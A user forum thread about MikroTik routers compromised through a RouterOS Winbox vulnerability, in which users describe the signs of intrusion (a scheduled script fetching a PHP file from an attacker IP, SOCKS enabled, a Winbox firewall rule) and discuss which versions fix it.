Hello all.
Ive noticed on several routers i have that theres a new vulnerability affecting versions 6.41.3 mostly, im not sure before 6.42.6 though.
The attack involves a creation of a schedule and a script fetching a /mikrotik.php every 30secs under this ip :95.154.216.160
Has anyone noticed the same?
Is Mikrotik aware of this?
Also the same in this topic.
http://forum.mikrotik.com/t/intrusion-shortly-after-sending-support-file/121622/1
Yes this is the with box vulnerability from April. You must patch to current as it was fixed in 6.42.1
About 26 hours ago i had a router exploited and it left the same traces (socks enabled, filter rule position 0 allowing winbox, script fetching that PHP file on schedule). it seems very much like someone preparing a botnet
If it is that vulnerability then it is also fixed since RouterOS version: 6.40.8 and 6.43rc4
April vulnerability (or more like person/group/entity mass-misusing it) was typical with downloading “update.aspx” page. If this one use mikrotik.php, it is likely to be different attacker, who is most probably (but not certainly) using same vulnerability.
Thanks for sharing.
please dont misinform people with this topics